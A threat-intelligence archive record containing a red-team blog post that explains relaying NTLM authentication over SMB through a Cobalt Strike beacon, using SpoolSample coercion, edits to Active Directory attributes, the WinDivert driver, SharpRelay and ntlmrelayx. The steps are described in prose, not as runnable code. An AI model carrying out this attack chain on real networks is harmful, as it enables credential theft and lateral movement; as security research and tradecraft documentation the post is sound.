{
	"id": "0a4301b9-95b9-4119-a64e-77627f211f59",
	"created_at": "2026-04-06T00:20:16.594823Z",
	"updated_at": "2026-04-10T03:24:24.58267Z",
	"deleted_at": null,
	"sha1_hash": "14ba5ae43f1e5953309d6fe134aed75734091a05",
	"title": "Relay Attacks via Cobalt Strike Beacons",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 231488,
	"plain_text": "Relay Attacks via Cobalt Strike Beacons\r\nBy pkb1s\r\nPublished: 2020-02-01 · Archived: 2026-04-02 10:48:37 UTC\r\nIntroductionPermalink\r\nBack in 2018, Will Shroeder, Lee Christensen and Matt Nelson shared their awesome research around Active\r\nDirectory trusts at DerbyCon. During the last part of their presentation they showed how we can abuse the Print\r\nSpooler service in order to force a computer to authenticate against another computer. Lee also released a tool that\r\nallows us to do this easily called SpoolSample. If you are not familiar with this attack I highly recommend reading\r\nthe following blog posts:\r\nhttps://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\r\nhttps://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/\r\nMost of the abuses I have seen so far are using the SpoolSample tool along with compromising a server with\r\nUnconstrained Delegation enabled. This allows the attacker to force a computer authenticate back to the attacker\r\nusing Kerberos and since Unconstrained Delegetation is enabled on the compromised server, the victim also sends\r\ntheir TGT within the TGS. However, there is another way to compromise computers.\r\nIf we run the SpoolSample tool with IP addresses as arguments instead of domain names, the target computer will\r\ninitiate an authentication attempt using Net-NTLM and it is known for many years that Net-NTLM authentication\r\nis vulnerable to relay attacks. This means that we can use SpoolSample to make a computer object authenticate\r\nback to a computer we control and relay this authentication to another host.\r\nThe scenario where this is useful is the following:\r\nOK, lets put this attack aside for now and we will come back to it later.\r\nAnother scenario that we find very often when reviewing AD environments is when a user object has rights such\r\nas GenericAll or GenericWrite on another user object similar to the following:\r\nhttps://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/\r\nPage 1 of 6\n\nIf we have compromised Alice then we can do the following:\r\nUse a targeted Kerberoasting attack against Bob by setting an SPN and requesting a TGS\r\nForce a password change for Bob\r\nHowever, both of these attacks have limitations. For targeted kerberoasting the user must be configured with a\r\nweak password in order to crack it. As for changing Bob’s password it might be something that you don’t want to\r\ndo during a red team operation to avoid disruption or raising suspicion.\r\nSo I started looking at the different attributes a user has and another option is to modify one of the following use\r\nattributes:\r\nhomeDirectory - Specifies the home directory of the account and it can be a UNC path.\r\nprofilePath - Specifies a path to the user’s profile and it can also be a UNC path.\r\nBy modifying any of these attributes, we can point them to a UNC path of a computer under your control and\r\nperform an SMB relay attack.\r\nSomething you might be wondering so far is this - You have been telling me these ways of exploiting AD objects\r\nbased on ACL misconfigurations and SMB relay attacks but you haven’t told me how to perform a relay attack if\r\nall I have is a Cobalt Strike beacon.\r\nKeep reading and your question will be answered ;)\r\nRelay AttacksPermalink\r\nSo far I have mentioned relay attacks, and specifically SMB relays. This kind of attack has been known for many\r\nyears. If you want to learn more about SMB relay you can read the following posts:\r\nhttps://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-\r\nminutes.html\r\nhttps://www.sans.org/blog/smb-relay-demystified-and-ntlmv2-pwnage-with-python/\r\nThe rest of this post is based on the reader’s basic understanding of relay attacks so make sure you have read the\r\nabove posts.\r\nOK, I understand how SMB relay attacks work. Now what?Permalink\r\nhttps://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/\r\nPage 2 of 6\n\nWhen I performed relay attacks in the past I was always doing an internal pentest and I had physical access to the\r\ntarget network. But, why not use these powerful attacks while on a red team operation and you have to do\r\neverything through a Cobalt Strike beacon?\r\nIt looks like there is a way to do this! Actually this is possible for a few years now thanks to the very cool\r\ndivertTCPconn and hwfwbypass projects.\r\nDivertTCPconn is based on hwfwbypass and both are written in C++. It is using the amazingly complicated\r\nWinDivert project written by Basil:\r\nhttps://github.com/basil00/Divert\r\nHow does it work?Permalink\r\nAccording to it’s description, WinDivert is a kernel driver that allows for user-mode packet interception and\r\nmodification. The user needs to specify a filter and any packets that match this filter will be intercepted and can be\r\nmodified.\r\nThe WinDivert.sys driver is installed below the Windows network stack. The\r\nfollowing actions occur:\r\n(1) A new packet enters the network stack and is intercepted by WinDivert.sys\r\n(2a) If the packet matches the PROGRAM-defined filter, it is diverted. The\r\n PROGRAM can then read the packet using a call to WinDivertRecv().\r\n(2b) If the packet does not match the filter, the packet continues as normal.\r\n(3) PROGRAM either drops, modifies, or re-injects the packet. PROGRAM can\r\n re-inject the (modified) using a call to WinDivertSend().\r\nThe most important thing that WinDivert allows us to do is to intercept traffic going to an open Windows port and\r\nredirect it to another port by modifying the TCP source and destination ports of each packet, recalculating the TCP\r\nchecksums and reinjecting the packets into the network stack.\r\nHow does this help us?Permalink\r\nOn Windows, port 445 is always running by default. I won’t go into detail about the process using port 445\r\nbecause this is already analysed in the following post, so please go ahead and read it:\r\nhttps://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/\r\nAs mentioned in the above post, it also contains another interesting idea. Using WinDivert to perform an SMB\r\nrelay attack via Metasploit. You can upload a few DLLs and a driver file to the target host along with the\r\ndivertTCPconn.exe and execute them. I found this attack to be awesome, but what I didn’t like was that you had to\r\nupload multiple DLLs on the target host.\r\nSo my goal was to do the same attack by dropping the minimum amount of files on disk and also executing the\r\nattack through Cobalt Strike.\r\nhttps://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/\r\nPage 3 of 6\n\nSMB Relay through Cobalt StrikePermalink\r\nFirst of all, I wanted to make use of Cobalt Strike’s execute-assembly function so I decided to write my code\r\nusing the .NET framework. My initial thought would be to re-write divertTCPconn in C# and then everything\r\nwould work. It turns out that this was very complicated. Fortunately, I found the following NuGet package by\r\nTechnikEmpire:\r\nhttps://github.com/TechnikEmpire/WinDivertSharp\r\nUsing WinDivertSharp, I was able to write a tool called SharpRelay to communicate with the WinDivert driver\r\nand perform any packet modification I wanted. The only requirement for this attack to work is to have a beacon\r\nwith local administrator privileges or with the ability to load drivers. The attack using SharpRelay works as\r\nfollows:\r\nUpload the signed WinDivert driver into any folder on the compromised host\r\nRun SharpRelay to modify the destination port of the incoming packets on port 445 and redirect them to\r\nanother port (e.g. 8445)\r\nFrom our beacon run the Cobalt Strike’s rportfwd command to forward port 8445 of the compromised\r\nhost to our teamserver’s port 445.\r\nStart a socks server to forward the relayed traffic back to the victim network\r\nRun Impacket’s ntlmrelayx with proxychains to do the SMB relay\r\nWhen a victim tries to access port 445 of the compromised host the NTLM authentication will be\r\nforwarded to our teamserver and relayed to another machine\r\nThe code of SharpRelay can be found here:\r\nhttps://github.com/pkb1s/SharpRelay\r\nAlso, a big part of the code I used for the packet interception was taken from this project by TechnikEmpire:\r\nhttps://github.com/TechnikEmpire/CitadelCore\r\nShow me a video or it didn’t happenPermalink\r\nTo demonstrate the attacks I described in the beginning of the post, I made the following videos.\r\nSpoolSample to SMB RelayPermalink\r\nAs mentioned earlier we have the following scenario:\r\nhttps://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/\r\nPage 4 of 6\n\nThe following video demonstrates how we can use the SpoolSample tool to compromise a computer object via an\r\nSMB relay attack:\r\n01:22\r\nAbusing weak ACLs on a User ObjectPermalink\r\nAs shown earlier, the scenario we are going to abuse it the following:\r\nHaving a local administrator beacon running as Alice, we will modify Bob’s homeDirectory attribute and point it\r\nto the workstation where we have our beacon running (10.1.1.20). Next time Bob logs in to his workstation he will\r\ntry to authenticate against the compromised host and we will perform our SMB relay attack:\r\n01:38\r\nhttps://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/\r\nPage 5 of 6\n\nSource: https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/\r\nhttps://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/"
	],
	"report_names": [
		"Relay-attacks-via-Cobalt-Strike-beacons"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434816,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/14ba5ae43f1e5953309d6fe134aed75734091a05.pdf",
		"text": "https://archive.orkl.eu/14ba5ae43f1e5953309d6fe134aed75734091a05.txt",
		"img": "https://archive.orkl.eu/14ba5ae43f1e5953309d6fe134aed75734091a05.jpg"
	}
}